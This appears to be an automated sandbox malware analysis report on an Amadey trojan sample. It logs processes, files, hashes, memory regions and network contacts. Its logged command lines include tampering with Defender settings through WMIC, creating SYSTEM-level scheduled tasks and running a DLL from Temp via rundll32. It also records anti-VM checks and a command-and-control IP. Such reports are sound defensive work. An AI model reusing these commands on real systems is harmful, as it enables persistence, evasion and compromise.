powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\Wbem\WMIC.exe

"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\XUTZbGF.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\Qgobkqe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\qcQCdBm.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 00:06:23 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll\",#1 /ZBEUdidXQBy 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll",#1 /ZBEUdidXQBy 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\HqbxzkqB\HMAXKwB.dll",#1 /ZBEUdidXQBy 385118

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5916 -ip 5916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5916 -s 1040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 884 -ip 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 884 -s 2372

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"

Network


Files


C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39aa6cd3b5015789a2a22d1ac942563a
SHA1 df7ed2b033b646c1624516a15a9d2789f124531d
SHA256 2c11c872d32be7869ce0694b3170c69c843e59f31d6d2207dbf826a5b911bc7b
SHA512 ab5b9bd9fbf742c1f98c8ce3624f2caed47f5e50d710c69b3957fb938a6cd45581175cd4e3277f26701332c627c1b47dcb7f1920b2504cf947833894d5fa8e75

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2d0862fb76dd8c5a31122fbb8c28b5a1
SHA1 5911c3986855c490e530629976a661f611e50ca4
SHA256 2774b98bb9892ab2b92926a50313dfde327c41f36e3e9292d30fdfcde5b0443a
SHA512 1f5089433fbf629dc460d29d0f3e4defc62991055d7b9f4bd5519cbadbb63862554f1d393fa35fd569568c714f068549391896e608ab286de6401494b34c4c17

memory/4308-584-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1928-585-0x0000000000720000-0x0000000000D1A000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 60176103a784ed7680a938725aec2298
SHA1 88364284348a7d03e5dea2509992fec19399072f
SHA256 9b23d32ebb32a97605019bae68c009d1ab4be5e71359a562b45c3b4adb72d574
SHA512 7e76e824d48e2a1ffee55e8dc720d49e06841ff43f33e268d1f13d85c4e2e4ef2f8a4e401201a8356e566f99f5300bf5dde55afd0dd4e4f87d9e419611e218d2

memory/1984-602-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/1928-604-0x0000000000720000-0x0000000000D1A000-memory.dmp

memory/5272-605-0x0000000000400000-0x000000000045C000-memory.dmp

memory/5272-606-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4308-607-0x0000000000270000-0x000000000071D000-memory.dmp

memory/1984-609-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/5272-611-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4556-648-0x0000000000270000-0x000000000071D000-memory.dmp

memory/5608-649-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/5608-651-0x0000000000DF0000-0x00000000012B3000-memory.dmp

memory/4556-653-0x0000000000270000-0x000000000071D000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9d37106a4056ee605e1c9954255758c7
SHA1 60cf0a78527250965ccc7a70b93474a8bc1bea57
SHA256 97edfef15da0f0fed370a01ebeb937e0eeee76dc1636104ec4149888b3a8e6ce
SHA512 e3914044631f981d268959ed3f1836f7cbb69854cb6fd89c79d45785eec916137740362c5a39629cd5fb64087dc662e418bf0820bbee40374791e096a0b51cf0

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c3d997313aefe741fedb90ebc4edde1e
SHA1 edd02eae3d8a7baea8020e6b2c86d2840122ac85
SHA256 19f4cbeff9e5f1b81908a7c25df9eadb5a57ae669be0f33c9668ebf0427bf726
SHA512 2a2ccb67ab6363d238a48800f41ac80935212ab227455c31d62517cae4541acfe28b7a23b9e16e4904b94124af45f270367b7c6500f46951a2a61f44ae8235cd

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 8697c038b56ee3aee54b92b5024f89b4
SHA1 f6bb036398b73dfbf1153a163fa764f989174e44
SHA256 6bec6bd5b28406a540b3d18bffe2cce45022fb260803e7eb420bb00bb86450e4
SHA512 9863f1b4afca249425be8f0bcf7a2409f63d33e9b56885c9d8c64065fe31f38fe5d992d2528ab0d78b4ec2a25731439eceb5b20de0ca1ae883d0e457f8f1d29d

memory/6136-728-0x0000000004C70000-0x0000000004CBC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 0a48000b0ebb8e94be299edc703328fe
SHA1 02c746f931d1bc73303e8b0fa42eb5cb9bc9cc52
SHA256 81d9b12cf4c7aeb97fff5d5616bd36e230c3cd69397f2ad1c962582f1072dd47
SHA512 01aeeb4e8417c5784c069bcd7511edec7091274a9bd4e9137152d5e18b11ec7c242253983d1d8732dda72c82a9ca46f06696525a6235b41bea04ddd58fa1c0c1

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Program Files (x86)\JipyTrDkU\IybSyoS.xml

MD5 3399a172bdd15610616a19481f631e1e
SHA1 ad395a0e6666532e2b3d015bb42862508e33ff85
SHA256 388f67c3c2719ebe0d7882f5d9e82e51555474d6954313f934f8a929615edf4e
SHA512 210200efa5808c0fe5b8eb9e95c9fcbe7558e9abe52d97995347816b8f29e7a00821654ea6ebe969ebe474afea2da73136183d1c98bffb20cb07c5c3e1450b13

C:\Users\Admin\AppData\Local\Packages\favicon.png

MD5 1603865df23efcd1dc421a48f090b2d5
SHA1 29c835478c413295787656da1201a3bd08582267
SHA256 fc48da13fe7501b9a08daced7a7fadc6914a36c6c12461a73d2170d748be5712
SHA512 e9bca0319aa1cacdd86a3b5b5904cd508a245e64399acf335299b298feec130985b68ad3456b177aa466284c6239e952aa15ed0e6545ae6ad72848d3ea6405b1

memory/5200-1060-0x000001B09CFF0000-0x000001B09CFFA000-memory.dmp

memory/5200-1059-0x000001B09D000000-0x000001B09D012000-memory.dmp

C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml

MD5 c37d3061328fe881942d1fed10162551
SHA1 8388d7f234f7a634da08a64c1a39cd5681de8b0a
SHA256 672edf87fa5e034aabf4de04bf5e89b7f2da5b95523314945001de1ca659668d
SHA512 17139f0a804fa54decafa59d1f04ddbe5ece5e4bd63a3600070dd12d1d6ec34fba7ebb0fd291f1f0f11b4084244167be9d1729be4a3591682aad3f8056f69dd1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\prefs.js

MD5 1c8695deaf2ddc855c755dc362247d32
SHA1 b7068343a8cdaab8fe1cf0038ab7250bba869b1e
SHA256 63475b7737aa00ab765e7b39127f89345bbe99f493253a9b81e084152e4c7261
SHA512 a068da8a531d0f95e6fa56bfbbfb358fcbab38e559d941603e168d4339991939e8f6fd3146fb055a51f0c26555487fc0f3bfe3803eaf4caf2e702827631b6461

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 6665488cb07e358b79177c86a8c41fd4
SHA1 03f8be1bfe5c880f3bce2b78938547653ebfef95
SHA256 c45d4ecd8da9d45cb8478dade5f8b003bae0373e2f86967fa58b9f9ad1801068
SHA512 91d801fb945c2acf20240afbba8e37bc2a8af412441a414bfc761dc26ca603ed98441c1b54d5382f41eaeaa17d34cddd5c16b78bc2c3ec4a22e351f6fa8179e8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 a093f71580f3d39395a3eefdf3a2caa1
SHA1 d12cd1418250daa5ca13f9aa8f74e10fe404b9bf
SHA256 a3591ce53b72e7e425e325c3681f777410e6bc96a21d1cde058fe552f3fed713
SHA512 a7a55e762479e6691be446176b9e9351fb01b5353f5beb15b5b08b190e5af0aa28f2975b38a6212c26108c8174d01465ec3f9a6312b525c024e88312a12cf938

memory/3708-1164-0x0000000000400000-0x000000000046E000-memory.dmp

memory/3708-1167-0x00000000083E0000-0x000000000842C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-05-30 02:40

Reported: 2024-05-30 02:42

Platform: win11-20240426-en

Max time kernel: 144s

Max time network: 122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2994005945-4089876968-1367784197-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explortu.job C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

Network

Country  Destination        Domain                      Proto
RU       147.45.47.155:80   147.45.47.155               tcp
US       8.8.8.8:53         155.47.45.147.in-addr.arpa  udp
IE       52.111.236.21:443  -                           tcp

Files

memory/232-0-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/232-1-0x0000000077696000-0x0000000077698000-memory.dmp

memory/232-2-0x0000000000211000-0x000000000023F000-memory.dmp

memory/232-3-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/232-5-0x0000000000210000-0x00000000006D3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe

MD5 c61e453e041187460ae78a855542277a
SHA1 e45ee70d1dd37142ab6f9c298008f6e99a705c1b
SHA256 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
SHA512 b49d785316e1928b25a2e56bbc5343caedb529aeb563c21013483904a1f4d6a6bec61a744ecf124a3b82cfd7aa51d569b823ad9523b5fbacf15d58afb4d4baf7

memory/232-17-0x0000000000210000-0x00000000006D3000-memory.dmp

memory/3476-18-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-19-0x0000000000B51000-0x0000000000B7F000-memory.dmp

memory/3476-20-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-21-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-22-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-23-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-24-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-25-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-26-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-27-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-29-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-30-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-31-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/5092-32-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-33-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-34-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-35-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-36-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-37-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-38-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/4708-40-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/4708-41-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-42-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-43-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-44-0x0000000000B50000-0x0000000001013000-memory.dmp

memory/3476-45-0x0000000000B50000-0x0000000001013000-memory.dmp